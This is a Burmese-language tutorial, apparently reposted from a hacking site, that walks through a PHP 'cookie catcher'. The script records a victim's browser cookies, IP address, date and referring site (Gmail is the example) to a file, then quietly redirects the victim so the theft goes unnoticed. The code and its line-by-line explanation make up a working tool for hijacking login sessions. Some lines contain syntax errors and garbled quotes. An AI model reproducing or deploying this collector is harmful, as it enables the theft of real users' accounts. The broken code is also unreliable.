ဒီေန႕ေတာ့ Cookies Catcher ေတြအေၾကာင္းေျပာရေအာင္.။ Cookies Catcher ဆိုတာ Cookies ေတြကို Capture လုပ္ဖို႕ လုပ္ထားတဲ့ PHP Script ပါ။ ( Cookies ဆိုတာေတာ့အထူးေျပာဖို႕လိုမယ္မထင္ပါဘူး Browser ေတြမွာ User Login ေတြ Password ေတြကို သိမ္းထားတဲ့ Special Things ေတြေပါ့ ) ကဲ အခု Cookies Catcher တစ္ခုအေၾကာင္းၾကည့္ရေအာင္.။
Code
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);;
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Website: '.$referer.'
');
fclose($fp);
header (\"javascript:history.back()\");
?>တစ္ခုခ်င္းစီကိုၾကည့္ရေအာင္ဗ်ာ။
Code
$cookie = $_GET['cookie'];ဒါကေတာ့ Get Method နဲ႕ Cookie ကိုယူပါတယ္Code
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);
$referer=$_SERVER['HTTP_REFERER'];REMOTE_ADDR ကေတာ့ Victim ရ႕ဲ IP ပါ
date ကေတာ့ Cookies ယူတဲ့ ေန႕ပါ
HTTP_REFERER ကေတာ့ Cookies သိမ္းခံရတဲ့ Address ပါ ( ဥပမာ Mail.google.com ေပါ့ ) XDCode
$fp = fopen('cookies.html' 'a');
fwrite($fp, ‘Cookie: ‘.$cookie.’
IP: ‘ .$ip. ‘
Date and Time: ‘ .$date. ‘
Website: ‘.$referer.’
’);
fclose($fp);ဒီေနရာေလးကေတာ့ နည္းနည္းရႈပ္သြားပါတယ္ ။ ပထမဆံုး cookies.html ဆိုတဲ့ File ကိုဖြင့္ပါတယ္ ျပီးတာနဲ႕ အဲ့ဒီ့ဖုိင္ထဲမွာ Cookies ကိုသြား Write ပါတယ္ ။ ခုန အထက္က ေရးထားတဲ့ IP , Date , Referer ေတြေရာေပါ့ ျပီးတာနဲ႕ cookies.html ကို ပိတ္လုိက္ပါတယ္Code
header (\"javascript:history.back()\");ေနာက္ဆံုးအေၾကာင္းအေနနဲ႕ေတာ့ User ကို Cookies Catcher ထဲကိုေရာက္ျပီး Catcher က Cookies ေတြသိမ္းအျပီး ဘယ္ကို ျပန္ပို႕မယ္ဆုိတာပါ အခုေတာ့ ၀င္ခဲ့တဲ့ေနာက္တစ္ေနရာကိုျပန္ပို႕ထားပါတယ္ (ဥပမာ User က www.site.com/index.php?=shop.phpက လာတယ္ အဲ့မွာ Cookies Catcher ကို၀င္မိသြားတယ္ www.target.com/cookiescatcher.phpေပါ့ Cookies Catcher ကလည္း cookies.html မွာ Cookies ေတြသိမ္းတယ္ ေရာက္သြားတာနဲ႕ Cookies သိမ္းသြားတာကို User မသိလိုက္ပါ ျပီးမွ သိမ္းျပီးမွ User ကိုတစ္ေနရာရာျပန္ပို႕လုိက္ပါတယ္ ဥပမာ index.php ကိုပဲေပါ့ ) ကဲ ဒီေလာက္ဆုိ အဆင္ေျပမယ္ထင္ပါတယ္ ဒီလုိမ်ိဳး တျခားတစ္ေယာက္ေရးထားတာ ဖတ္ဖူးလို႕ သူ႕ဟာကိုရွာမရတာနဲ႕ ကိုယ္တိုင္စမ္းတ၀ါး၀ါးေရးလိုက္ရပါတယ္
source from ghostarea.net






